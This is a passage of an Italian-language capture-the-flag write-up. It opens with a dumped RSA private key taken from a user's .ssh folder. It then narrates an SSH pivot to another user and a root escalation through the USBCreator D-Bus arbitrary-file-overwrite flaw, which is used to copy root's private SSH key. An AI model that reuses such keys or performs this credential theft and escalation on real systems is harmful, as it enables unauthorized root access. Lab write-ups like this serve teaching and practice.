MIIEpAIBAAKCAQEAs14rHBRld5fU9oL1zpIfcPgaT54Rb+QDj2oAK4M1g5PblKu/
+L+JLs7KP5QL0CINoGGhB5Q3aanfYAmAO7YO+jeUS266BqgOj6PdUOvT0GnS7M4i
Z2Lpm4QpYDyxrgY9OmCg5LSN26Px948WE12N5HyFCqN1hZ6FWYk5ryiw5AJTv/kt
rWEGu8DJXkkdNaT+FRMcT1uMQ32y556fczlFQaXQjB5fJUXYKIDkLhGnUTUcAnSJ
JjBGOXn1d2LGHMAcHOof2QeLvMT8h98hZQTUeyQA5J+2RZ63b04dzmPpCxK+hbok
sjhFoXD8m5DOYcXS/YHvW1q3knzQtddtqquPXQIDAQABAoIBAGwqMHMJdbrt67YQ
eWztv1ofs7YpizhfVypH8PxMbpv/MR5xiB3YW0DH4Tz/6TPFJVR/K11nqxbkItlG
QXdArb2EgMAQcMwM0mManR7sZ9o5xsGY+TRBeMCYrV7kmv1ns8qddMkWfKlkL0lr
lxNsimGsGYq10ewXETFSSF/xeOK15hp5rzwZwrmI9No4FFrX6P0r7rdOaxswSFAh
zWd1GhYk+Z3qYUhCE0AxHxpM0DlNVFrIwc0DnM5jogO6JDxHkzXaDUj/A0jnjMMz
R0AyP/AEw7HmvcrSoFRx6k/NtzaePzIa2CuGDkz/G6OEhNVd2S8/enlxf51MIO/k
7u1gB70CgYEA1zLGA35J1HW7IcgOK7m2HGMdueM4BX8z8GrPIk6MLZ6w9X6yoBio
GS3B3ngOKyHVGFeQrpwT1a/cxdEi8yetXj9FJd7yg2kIeuDPp+gmHZhVHGcwE6C4
IuVrqUgz4FzyH1ZFg37embvutkIBv3FVyF7RRqFX/6y6X1Vbtk7kXsMCgYEA1WBE
LuhRFMDaEIdfA16CotRuwwpQS/WeZ8Q5loOj9+hm7wYCtGpbdS9urDHaMZUHysSR
AHRFxITr4Sbi51BHUsnwHzJZ0o6tRFMXacN93g3Y2bT9yZ2zj9kwGM25ySizEWH0
VvPKeRYMlGnXqBvJoRE43wdQaPGYgW2bj6Ylt18CgYBRzSsYCNlnuZj4rmM0m9Nt
1v9lucmBzWig6vjxwYnnjXsW1qJv2O+NIqefOWOpYaLvLdoBhbLEd6UkTOtMIrj0
KnjOfIETEsn2a56D5OsYNN+lfFP6Ig3ctfjG0Htnve0LnG+wHHnhVl7XSSAA9cP1
9pT2lD4vIil2M6w5EKQeoQKBgQCMMs16GLE1tqVRWPEH8LBbNsN0KbGqxz8GpTrF
d8dj23LOuJ9MVdmz/K92OudHzsko5ND1gHBa+I9YB8ns/KVwczjv9pBoNdEI5KOs
nYN1RJnoKfDa6WCTMrxUf9ADqVdHI5p9C4BM4Tzwwz6suV1ZFEzO1ipyWdO/rvoY
f62mdwKBgQCCvj96lWy41Uofc8y65CJi126M+9OElbhskRiWlB3OIDb51mbSYgyM
Uxu7T8HY2CcWiKGe+TEX6mw9VFxaOyiBm8ReSC7Sk21GASy8KgqtfZy7pZGvazDs
OR3ygpKs09yu7svQi8j2qwc7FL6DER74yws+f538hI7SHBv9fYPVyw==
-----END RSA PRIVATE KEY-----

Sempre dentro la cartella .ssh di paul si trova il file authorized_keys, analizzandone il contenuto noto che contiene la chiave pubblica di nadav.

A questo punto faccio semplicemente ssh nadav@localhost

Ah dimenticavo, come paul ho preso la flag di user.

Come nadav la prima cosa che faccio è analizzare i processi ma non sembra esserci niente di strano. Dopo un’estenuante ricerca, casualmente apro il file .viminfo all’interno della home di nadav. Il file viminfo è la cache di vim, al suo interno vedo che sono stati modificati alcuni file tra cui /etc/dbus-1/system.d/com.ubuntu.USBCreator.conf.

Facendo una ricerca su Google scopro che esiste una vulnerabilità in USBCreator D-Bus interface che permetterebbe una privilege escalation. Per i dettagli vi rimando all’articolo:

https://unit42.paloaltonetworks.com/usbcreator-d-bus-privilege-escalation-in-ubuntu-desktop/

Infondo all’articolo viene spiegato come a causa della vulnerabilità, sia possibile leggere e sovrascrivere dei file inaccessibili senza la richiesta della password.

Inspecting the source code for the service, we see that it contains a Python implementation of the Unix tool dd. This tool can be used, among other things, to copy files between locations. The input to the method _builtin_dd is taken directly from user input. Furthermore, no path sanitation checks are performed on the source or target path, and no password prompts are being used – this allows a user to overwrite arbitrary files on the filesystem, as root, with no password prompting.

Quindi lancio il comando e mi copio la chiave ssh privata di root.

Infine accedo con ssh e prendo la flag.